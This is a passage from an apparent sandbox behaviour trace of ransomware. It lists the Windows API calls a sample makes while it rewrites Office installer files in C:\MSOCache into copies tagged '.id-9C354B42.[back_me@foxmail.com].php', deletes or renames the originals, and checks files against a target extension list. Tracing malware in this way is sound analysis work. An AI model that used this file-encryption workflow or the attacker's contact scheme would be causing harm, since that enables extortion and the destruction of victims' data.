SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.180] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.182] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.182] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.184] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0048.184] CloseHandle (hObject=0x1e8) returned 1 [0048.184] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString=".doc") returned 4 [0048.185] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.185] lstrlenW (lpString=".docx") returned 5 [0048.185] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.185] lstrlenW (lpString=".pdf") returned 4 [0048.185] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.185] lstrlenW (lpString=".xls") returned 4 [0048.185] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.185] lstrlenW (lpString=".xlsx") returned 5 [0048.185] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.185] lstrlenW (lpString=".ppt") returned 4 [0048.185] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString=".zip") returned 4 [0048.185] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.185] lstrlenW (lpString=".rar") returned 4 [0048.185] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.185] lstrlenW (lpString=".bz2") returned 4 [0048.185] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.185] lstrlenW (lpString=".7z") returned 3 [0048.185] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString=".dbf") returned 4 [0048.185] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString=".1cd") returned 4 [0048.185] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.185] lstrlenW (lpString=".jpg") returned 4 [0048.186] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString=".doc") returned 4 [0048.186] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.186] lstrlenW (lpString=".docx") returned 5 [0048.186] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.186] lstrlenW (lpString=".pdf") returned 4 [0048.186] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.186] lstrlenW (lpString=".xls") returned 4 [0048.186] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.186] lstrlenW (lpString=".xlsx") returned 5 [0048.186] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.186] lstrlenW (lpString=".ppt") returned 4 [0048.186] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString=".zip") returned 4 [0048.186] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.186] lstrlenW (lpString=".rar") returned 4 [0048.186] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.186] lstrlenW (lpString=".bz2") returned 4 [0048.186] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.186] lstrlenW (lpString=".7z") returned 3 [0048.186] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString=".dbf") returned 4 [0048.186] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString=".1cd") returned 4 [0048.186] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.186] lstrlenW (lpString=".jpg") returned 4 [0048.186] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.187] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0048.187] lstrlenW (lpString="PidGenX.dll") returned 11 [0048.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0048.187] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=1463568) returned 1 [0048.187] CloseHandle (hObject=0x1e8) returned 1 [0048.187] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0048.187] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0048.187] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.187] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.188] GetLastError () returned 0x0 [0048.188] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.470] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.806] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x65520, lpOverlapped=0x0) returned 1 [0048.837] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0048.847] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.847] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.847] SetEndOfFile (hFile=0x20c) returned 1 [0048.847] CloseHandle (hObject=0x20c) returned 1 [0048.848] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.848] SetEndOfFile (hFile=0x1e8) returned 1 [0048.851] CloseHandle (hObject=0x1e8) returned 1 [0048.851] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.851] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0048.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.852] lstrlenW (lpString=".doc") returned 4 [0048.852] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString=".docx") returned 5 [0048.852] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.852] lstrlenW (lpString=".pdf") returned 4 [0048.852] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString=".xls") returned 4 [0048.852] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString=".xlsx") returned 5 [0048.852] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.852] lstrlenW (lpString=".ppt") returned 4 [0048.852] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.852] lstrlenW (lpString=".zip") returned 4 [0048.852] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString=".rar") returned 4 [0048.852] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.852] lstrlenW (lpString=".bz2") returned 4 [0048.852] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.852] lstrlenW (lpString=".7z") returned 3 [0048.852] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.852] lstrlenW (lpString=".dbf") returned 4 [0048.852] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.852] lstrlenW (lpString=".1cd") returned 4 [0048.852] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".jpg") returned 4 [0048.853] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".doc") returned 4 [0048.853] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString=".docx") returned 5 [0048.853] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0048.853] lstrlenW (lpString=".pdf") returned 4 [0048.853] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString=".xls") returned 4 [0048.853] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString=".xlsx") returned 5 [0048.853] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0048.853] lstrlenW (lpString=".ppt") returned 4 [0048.853] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".zip") returned 4 [0048.853] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString=".rar") returned 4 [0048.853] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0048.853] lstrlenW (lpString=".bz2") returned 4 [0048.853] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0048.853] lstrlenW (lpString=".7z") returned 3 [0048.853] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".dbf") returned 4 [0048.853] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".1cd") returned 4 [0048.853] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0048.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0048.853] lstrlenW (lpString=".jpg") returned 4 [0048.854] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0048.854] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0048.854] lstrlenW (lpString="setup.exe") returned 9 [0048.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0048.854] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=1377656) returned 1 [0048.854] CloseHandle (hObject=0x1e8) returned 1 [0048.854] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0048.854] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0048.854] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.854] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.855] GetLastError () returned 0x0 [0048.855] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0049.069] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0049.273] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x50588, lpOverlapped=0x0) returned 1 [0049.287] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0049.296] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.296] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.296] SetEndOfFile (hFile=0x20c) returned 1 [0049.296] CloseHandle (hObject=0x20c) returned 1 [0049.296] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.296] SetEndOfFile (hFile=0x1e8) returned 1 [0049.300] CloseHandle (hObject=0x1e8) returned 1 [0049.300] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0049.300] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0049.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.300] lstrlenW (lpString=".doc") returned 4 [0049.300] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0049.301] lstrlenW (lpString=".docx") returned 5 [0049.301] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0049.301] lstrlenW (lpString=".pdf") returned 4 [0049.301] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString=".xls") returned 4 [0049.301] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString=".xlsx") returned 5 [0049.301] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0049.301] lstrlenW (lpString=".ppt") returned 4 [0049.301] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString=".zip") returned 4 [0049.301] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString=".rar") returned 4 [0049.301] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString=".bz2") returned 4 [0049.301] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0049.301] lstrlenW (lpString=".7z") returned 3 [0049.301] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString=".dbf") returned 4 [0049.301] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString=".1cd") returned 4 [0049.301] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString=".jpg") returned 4 [0049.301] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.301] lstrlenW (lpString=".doc") returned 4 [0049.301] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0049.301] lstrlenW (lpString=".docx") returned 5 [0049.302] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0049.302] lstrlenW (lpString=".pdf") returned 4 [0049.302] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0049.302] lstrlenW (lpString=".xls") returned 4 [0049.302] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0049.302] lstrlenW (lpString=".xlsx") returned 5 [0049.302] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0049.302] lstrlenW (lpString=".ppt") returned 4 [0049.302] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0049.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.302] lstrlenW (lpString=".zip") returned 4 [0049.302] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0049.302] lstrlenW (lpString=".rar") returned 4 [0049.302] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0049.302] lstrlenW (lpString=".bz2") returned 4 [0049.302] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0049.302] lstrlenW (lpString=".7z") returned 3 [0049.302] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0049.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.302] lstrlenW (lpString=".dbf") returned 4 [0049.302] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0049.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.302] lstrlenW (lpString=".1cd") returned 4 [0049.302] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0049.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0049.302] lstrlenW (lpString=".jpg") returned 4 [0049.302] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0049.302] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0049.302] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0049.303] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.740] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=36233052) returned 1 [0049.740] CloseHandle (hObject=0x20c) returned 1 [0049.740] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0049.740] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.740] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 